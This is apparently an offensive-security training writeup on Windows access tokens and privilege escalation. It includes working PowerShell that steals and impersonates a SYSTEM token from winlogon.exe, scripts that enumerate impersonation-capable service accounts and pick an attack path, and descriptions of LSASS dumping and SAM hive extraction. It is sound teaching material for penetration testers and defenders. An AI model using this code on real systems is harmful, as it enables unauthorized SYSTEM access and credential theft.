Windows Token Fundamentals

Intermediate | 25 min | Writeup

Understanding Windows access tokens

Learning Objectives

  • Understand access tokens
  • Learn token privileges
  • Identify impersonation opportunities
  • Understand service accounts

Windows Access Tokens are the core of Windows security. Every process runs with a token that defines its identity and privileges. Token manipulation attacks allow us to "borrow" or "steal" tokens from other processes, running our code with their identity.

Think of tokens like security badges. Your badge determines which doors you can open and what actions you can perform. If you can clone or borrow a SYSTEM badge, you get SYSTEM access. Token impersonation is the art of badge cloning.

Foundation for Potato Attacks

Understanding tokens is essential for Potato attacks. These attacks abuse token impersonation privileges (SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege) to escalate to SYSTEM.

What Are Access Tokens?

Access Token Contents:
├── User SID (Security Identifier)
│   └── Who you are (S-1-5-21-xxx-xxx-xxx-1001)
├── Group SIDs
│   └── Groups you belong to (Administrators, Users, etc.)
├── Privileges
│   └── Special abilities (SeImpersonate, SeBackup, etc.), each one Enabled or Disabled
├── Owner SID
│   └── Default owner for created objects
├── Primary Group SID
│   └── Default group for created objects
├── Default DACL
│   └── Permissions for created objects
├── Token Type
│   └── Primary (process) or Impersonation (thread)
└── Impersonation Level
    └── How far an impersonation token may be used (see below)

Token Types:
├── Primary Token
│   ├── Assigned to processes
│   ├── Defines process identity
│   └── Created by LSASS at logon; each new process inherits a copy of its parent's
└── Impersonation Token
    ├── Attached to a thread, overriding the process identity for that thread only
    ├── Used by services to act on behalf of clients
    └── Target for token stealing attacks

Impersonation Levels

Impersonation Levels (least to most powerful):
├── SecurityAnonymous
│   ├── Client is anonymous
│   └── Cannot use token for impersonation
├── SecurityIdentification
│   ├── Server can read the client's identity, groups and privileges
│   └── Cannot impersonate
├── SecurityImpersonation
│   ├── Can impersonate the client on the LOCAL system
│   ├── Cannot use the client's identity to reach remote resources
│   └── Good enough for local privesc!
└── SecurityDelegation
    ├── Can impersonate ANYWHERE
    ├── Including network resources, across machine hops
    └── Most powerful, also most dangerous

For privilege escalation:
├── SecurityImpersonation is sufficient
├── A token you obtain at Identification level is useless: impersonating it does not give you its privileges
└── We impersonate locally to get a SYSTEM shell

Dangerous Token Privileges

batch
REM Check your token privileges
whoami /priv

REM Example output:
PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                                State
=============================== ========================================== ========
SeImpersonatePrivilege          Impersonate a client after authentication  Enabled
SeAssignPrimaryTokenPrivilege   Replace a process level token              Disabled
SeBackupPrivilege               Back up files and directories              Disabled
SeDebugPrivilege                Debug programs                             Disabled

REM "Disabled" only means the privilege is not currently switched on. Any process
REM that holds it can enable it with AdjustTokenPrivileges, so treat Disabled
REM entries as exploitable. Only privileges missing from the list are truly absent.

Privileges That Lead to SYSTEM

Token Privileges for Privilege Escalation:

SeImpersonatePrivilege:
├── Can impersonate a client's token at Impersonation level
├── Enables Potato attacks (JuicyPotato, PrintSpoofer, GodPotato)
├── Granted by default to service accounts (IIS app pools, SQL Server, LOCAL/NETWORK SERVICE)
└── Most important privilege for privesc

SeAssignPrimaryTokenPrivilege:
├── Can assign a primary token to a new process (CreateProcessAsUser)
├── Create a process with another user's token
└── Similar impact to SeImpersonate; the Potato tools use whichever of the two you hold

SeBackupPrivilege:
├── Can read ANY file when it is opened with backup semantics (bypasses the DACL)
├── A plain copy still fails; use reg save, robocopy /B or a tool that sets FILE_FLAG_BACKUP_SEMANTICS
├── Extract SAM, SYSTEM, SECURITY hives with reg save
├── Dump credentials without admin (and NTDS.dit on a domain controller)
└── Not a direct shell, but gets credentials

SeRestorePrivilege:
├── Can write ANY file (bypass ACLs)
├── Replace system binaries or a service executable/DLL
├── Modify sensitive files and registry keys
└── Leads to code execution as whoever runs the replaced binary

SeDebugPrivilege:
├── Open any non-protected process, regardless of owner
├── Dump LSASS memory (unless LSASS runs as a protected process, RunAsPPL)
├── Inject into privileged processes
└── Very powerful for credential theft and token stealing

SeTakeOwnershipPrivilege:
├── Take ownership of any securable object
├── Then rewrite the DACL to grant yourself access
└── Indirect path to access

SeLoadDriverPrivilege:
├── Load kernel drivers
├── Driver Signature Enforcement still applies on 64-bit, so in practice you load a signed but vulnerable driver
├── Kernel-level code execution
└── Ultimate privilege

SeImpersonate = Likely SYSTEM

If you see SeImpersonatePrivilege enabled, you're very likely one Potato attack away from SYSTEM. This is extremely common on web servers (IIS) and database servers (SQL Server).

Token Stealing Concepts

Token Stealing Attack Flow:

1. Identify Target Token
   ├── Find a process running as SYSTEM
   ├── Or a service with high privileges
   └── winlogon.exe and services.exe are the usual picks; lsass.exe is often
       Protected Process Light (RunAsPPL) and then cannot be opened at all

2. Get Handle to Target Process
   ├── OpenProcess() with PROCESS_QUERY_INFORMATION (enough to reach the token)
   ├── SeDebugPrivilege lets you open processes you do not own, such as SYSTEM's
   │   (it does not get past PPL)
   └── Or find an accessible process that already runs as the target

3. Duplicate the Token
   ├── OpenProcessToken() with TOKEN_DUPLICATE | TOKEN_QUERY to get a token handle
   ├── DuplicateTokenEx() to create an impersonation token (or a primary token for step 4)
   └── Now we have a copy of their token

4. Use the Token
   ├── ImpersonateLoggedOnUser() - the current thread becomes that user
   ├── CreateProcessWithTokenW() - spawn a process as them (needs SeImpersonatePrivilege)
   ├── CreateProcessAsUser() - same, but needs SeAssignPrimaryTokenPrivilege
   └── Or SetThreadToken() for a chosen thread

5. Run Payload
   ├── Our code now runs with the stolen identity
   ├── If we stole a SYSTEM token = SYSTEM access
   └── Full privilege escalation achieved
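The five steps above, driven from PowerShell through P/Invoke. This is an added example, not code from the original page. It assumes you are already an administrator (so SeDebugPrivilege is in your token, Disabled, and the script enables it), that the target is an ordinary SYSTEM process such as winlogon.exe rather than a PPL process, and that it runs in a console PowerShell where the script executes on a single thread (impersonation is per thread). The function names and access-mask constants are this example's; the Win32 functions and their signatures are the real ones.

```powershell
# Added example: steal a SYSTEM token and impersonate it on the current thread.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public class TokenApi {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr OpenProcess(uint access, bool inherit, uint pid);
    [DllImport("kernel32.dll", SetLastError=true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int level, int type, out IntPtr newToken);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool ImpersonateLoggedOnUser(IntPtr token);
    [DllImport("advapi32.dll", SetLastError=true)] public static extern bool RevertToSelf();
}
'@

function Enable-Privilege([string]$Name) {
    # A privilege that whoami /priv shows as "Disabled" is still in the token;
    # AdjustTokenPrivileges with SE_PRIVILEGE_ENABLED (2) switches it on.
    $hTok = [IntPtr]::Zero
    # TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x08)
    if (-not [TokenApi]::OpenProcessToken([TokenApi]::GetCurrentProcess(), 0x0028, [ref]$hTok)) { throw "OpenProcessToken failed" }
    $luid = New-Object 'TokenApi+LUID'
    if (-not [TokenApi]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "LookupPrivilegeValue($Name) failed" }
    $tp = New-Object 'TokenApi+TOKEN_PRIVILEGES'
    $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = 2
    $ok  = [TokenApi]::AdjustTokenPrivileges($hTok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    # Returns TRUE even when the privilege is not held; ERROR_NOT_ALL_ASSIGNED (1300) tells you.
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    [void][TokenApi]::CloseHandle($hTok)
    if (-not $ok -or $err -ne 0) { throw "Could not enable $Name (Win32 error $err)" }
}

function Invoke-TokenSteal([string]$ProcessName = 'winlogon') {
    Enable-Privilege 'SeDebugPrivilege'
    $target = Get-Process -Name $ProcessName | Select-Object -First 1
    # Step 2: PROCESS_QUERY_INFORMATION (0x400) is all OpenProcessToken needs.
    $hProc = [TokenApi]::OpenProcess(0x400, $false, [uint32]$target.Id)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($($target.Id)) failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())" }
    # Step 3: TOKEN_DUPLICATE (0x2) | TOKEN_QUERY (0x8) on the primary token, then a copy
    # at SecurityImpersonation (2) of type TokenImpersonation (2) with
    # TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY (0xE) on the copy.
    $hTok = [IntPtr]::Zero
    if (-not [TokenApi]::OpenProcessToken($hProc, 0x000A, [ref]$hTok)) { throw "OpenProcessToken failed" }
    $hDup = [IntPtr]::Zero
    if (-not [TokenApi]::DuplicateTokenEx($hTok, 0x000E, [IntPtr]::Zero, 2, 2, [ref]$hDup)) { throw "DuplicateTokenEx failed" }
    # Step 4: wear the copy on this thread, record who we became, then drop it again.
    if (-not [TokenApi]::ImpersonateLoggedOnUser($hDup)) { throw "ImpersonateLoggedOnUser failed" }
    $who = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
    [void][TokenApi]::RevertToSelf()
    foreach ($h in $hDup, $hTok, $hProc) { [void][TokenApi]::CloseHandle($h) }
    return $who
}

# From an elevated prompt this returns NT AUTHORITY\SYSTEM for winlogon.exe.
Invoke-TokenSteal
```

Between ImpersonateLoggedOnUser and RevertToSelf, anything this thread does (opening files, registry keys, named pipes) is checked against the SYSTEM token, which is exactly what the impersonation level governs: the duplicate was made at SecurityImpersonation, so it works locally but would not carry SYSTEM's identity to a remote share. To spawn a whole SYSTEM process instead, duplicate with type TokenPrimary (1) and hand the result to CreateProcessWithTokenW.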

Service Account Tokens

Common Service Accounts with Tokens:

LocalSystem (NT AUTHORITY\SYSTEM):
├── Highest privilege level
├── Full access to the system
└── Target for all token attacks

LocalService (NT AUTHORITY\LOCAL SERVICE):
├── Limited privileges, but SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege are granted by default
├── Authenticates to the network as anonymous
└── Still a Potato candidate despite looking unprivileged

NetworkService (NT AUTHORITY\NETWORK SERVICE):
├── Limited local privileges
├── Presents the computer account's credentials on the network
├── Holds SeImpersonatePrivilege by default!
└── Good target for Potato attacks

IIS AppPool Accounts:
├── IIS APPPOOL\DefaultAppPool (a virtual account per application pool)
├── Usually have SeImpersonatePrivilege
└── Perfect targets for web server privesc

SQL Server Accounts:
├── NT SERVICE\MSSQLSERVER (a virtual account)
├── Often SeImpersonatePrivilege
└── Database servers are common targets
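Rather than checking services one at a time with sc qc, the following added example (not from the original page) maps every running service to the account it runs under and flags the accounts the section above says hold SeImpersonatePrivilege by default. The flag is a default-configuration assumption only: services can have their privileges trimmed, so confirm with whoami /priv once you land in one. The function and variable names are this example's.

```powershell
# Added example: which services run as accounts worth becoming?
# Accounts that carry SeImpersonatePrivilege in a default Windows install.
$DefaultImpersonators = @(
    'LocalSystem',
    'NT AUTHORITY\LocalService',
    'NT AUTHORITY\NetworkService'
)

function Get-ServiceAccountMap {
    Get-CimInstance Win32_Service |
        Where-Object { $_.State -eq 'Running' -and $_.StartName } |
        ForEach-Object {
            $acct = $_.StartName
            # Virtual accounts (NT SERVICE\..., IIS APPPOOL\...) also get the privilege by default.
            $likely = ($DefaultImpersonators -contains $acct) -or
                      ($acct -like 'NT SERVICE\*') -or ($acct -like 'IIS APPPOOL\*')
            [pscustomobject]@{
                Service             = $_.Name
                Account             = $acct
                ProcessId           = $_.ProcessId
                BinaryPath          = $_.PathName
                LikelySeImpersonate = $likely
            }
        } | Sort-Object Account, Service
}

# Summary: each interesting account and how many services run under it
Get-ServiceAccountMap | Where-Object LikelySeImpersonate |
    Group-Object Account | Select-Object Name, Count

# Detail for the services that would give you a Potato-capable token if compromised
Get-ServiceAccountMap | Where-Object LikelySeImpersonate | Format-Table -AutoSize
```

The BinaryPath column is the follow-up: a service binary or its DLLs that you can write to, or a web application running inside one of these accounts, is the usual way into the token this section describes.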

Checking Token Information

batch
REM Current user's token info
whoami /all

REM Just privileges
whoami /priv

REM Groups (a service logon shows NT AUTHORITY\SERVICE here)
whoami /groups

REM Token of a specific process (needs SeDebugPrivilege, or you must own the process)
REM Use Process Explorer (Security tab of the process properties) or handle.exe

REM Find SYSTEM processes
tasklist /V /FI "USERNAME eq NT AUTHORITY\SYSTEM"

REM Check which account a service runs as
sc qc ServiceName
REM Look at SERVICE_START_NAME

powershell
# Owner of every process (Get-WmiObject is Windows PowerShell only; from an
# elevated prompt Get-Process -IncludeUserName gives the same answer)
Get-Process | Select-Object Name, Id, @{
    Name       = 'UserName'
    Expression = { (Get-WmiObject Win32_Process -Filter "ProcessId=$($_.Id)").GetOwner().User }
}

Token Impersonation Overview

Token Impersonation Attacks:

Potato Family (require SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege):
├── JuicyPotato - Windows 7/2008 up to Windows 10 1803 / Server 2016 (the DCOM activation trick was closed in 1809)
├── RoguePotato - Windows 10 1809+ / Server 2019 (needs an attacker-controlled OXID resolver reachable on TCP 135)
├── PrintSpoofer - Windows 10 / Server 2016 / 2019 (abuses the Print Spooler named pipe)
├── SweetPotato - Combination of the techniques above
└── GodPotato - Newer, works from Windows 8 / Server 2012 through Windows 11 / Server 2022

All Potato attacks:
├── Coerce a SYSTEM service into authenticating to an endpoint we control (named pipe or RPC/DCOM)
├── Impersonate that client (ImpersonateNamedPipeClient / RpcImpersonateClient); SeImpersonatePrivilege is what lets a low-privilege server do this at Impersonation level
├── Duplicate the resulting SYSTEM token
└── Get SYSTEM shell

Token Stealing Tools:
├── Incognito - List and impersonate tokens
├── Mimikatz - token::elevate
├── Meterpreter - steal_token, getsystem
└── Custom exploits - Direct API calls

Which to Use:
├── Service account with SeImpersonate? → Potato
├── Admin with SeDebug? → Token stealing from a SYSTEM process
├── Meterpreter session? → Built-in commands
└── No special privileges? → Find another vector

Token Enumeration Methodology

Token Analysis Flow

1. Check Privileges: whoami /priv - look for dangerous privileges (count Disabled ones too, they can be enabled)
2. SeImpersonate? If yes, proceed to Potato attacks
3. SeDebug? If yes, can dump lsass or steal tokens
4. SeBackup? If yes, can read SAM/SYSTEM hives
5. Service Account: check if running as a service account (whoami /groups lists NT AUTHORITY\SERVICE)
6. Choose Attack: select the appropriate technique for the privileges found
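The six-step flow above, and the "Privileges That Lead to SYSTEM" list earlier on the page, as one script. This is an added example, not code from the original page. It only shells out to whoami, which every supported Windows build ships, and it returns objects instead of printing so the result can be piped onward. The privilege-to-attack mapping in the hashtable is this example's condensed version of the page's list, not an exhaustive catalogue, and the function names are this example's.

```powershell
# Added example: audit the current token and pick an escalation path from it.
$DangerousPrivileges = @{
    'SeImpersonatePrivilege'        = 'Potato family (JuicyPotato/RoguePotato/PrintSpoofer/GodPotato) -> SYSTEM'
    'SeAssignPrimaryTokenPrivilege' = 'Potato family via CreateProcessAsUser -> SYSTEM'
    'SeDebugPrivilege'              = 'Steal a token from a SYSTEM process, or dump LSASS'
    'SeBackupPrivilege'             = 'reg save SAM/SYSTEM/SECURITY, then crack or pass the hashes'
    'SeRestorePrivilege'            = 'Overwrite a service binary or DLL that runs as SYSTEM'
    'SeTakeOwnershipPrivilege'      = 'Take ownership, rewrite the DACL, then proceed as with SeRestore'
    'SeLoadDriverPrivilege'         = 'Load a signed-but-vulnerable driver for kernel code execution'
}

function Get-TokenPrivilegeAudit {
    # /fo csv gives a parseable table. "Disabled" still counts: the privilege is in the
    # token and any process holding it can enable it with AdjustTokenPrivileges.
    $privs = whoami /priv /fo csv | ConvertFrom-Csv
    foreach ($p in $privs) {
        $name = $p.'Privilege Name'
        if ($DangerousPrivileges.ContainsKey($name)) {
            [pscustomobject]@{
                Privilege = $name
                State     = $p.State
                Path      = $DangerousPrivileges[$name]
            }
        }
    }
}

function Test-ServiceLogon {
    # Service logons carry the well-known SERVICE group (S-1-5-6); interactive logons do not.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    return [bool]($groups | Where-Object { $_.SID -eq 'S-1-5-6' })
}

function Get-TokenAttackPlan {
    $findings = @(Get-TokenPrivilegeAudit)
    $names    = @($findings | ForEach-Object Privilege)
    # Same priority order as the page's decision list.
    $plan = if ($names -contains 'SeImpersonatePrivilege' -or $names -contains 'SeAssignPrimaryTokenPrivilege') {
        'Potato attack'
    } elseif ($names -contains 'SeDebugPrivilege') {
        'Token theft from a SYSTEM process'
    } elseif ($names -contains 'SeBackupPrivilege') {
        'Hive extraction for credentials'
    } elseif ($findings.Count -gt 0) {
        'Indirect: ' + (($findings | ForEach-Object Path) -join '; ')
    } else {
        'No token-based path; find another vector'
    }
    [pscustomobject]@{
        Identity          = (whoami)
        ServiceLogon      = (Test-ServiceLogon)
        Findings          = $findings
        RecommendedAttack = $plan
    }
}

Get-TokenAttackPlan | Format-List
```

Run it from whatever shell you landed in (an IIS app pool, an xp_cmdshell call, a scheduled task). ServiceLogon being true together with SeImpersonatePrivilege in Findings is the textbook Potato situation; an Administrator's interactive shell instead shows ServiceLogon false and SeDebugPrivilege as Disabled, which is the token-stealing path.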

Knowledge Check

Quick Quiz

What privilege enables Potato attacks?

Challenges

Token Privilege Audit

Challenge
🌱 beginner

Enumerate your current token privileges and identify any that could lead to privilege escalation.


Key Takeaways

  • Tokens define process/thread identity and privileges
  • SeImpersonatePrivilege enables Potato attacks → SYSTEM
  • Service accounts often have impersonation privileges
  • Always check whoami /priv for escalation paths
  • Web servers and DB servers are common targets
  • Token theft requires understanding impersonation levels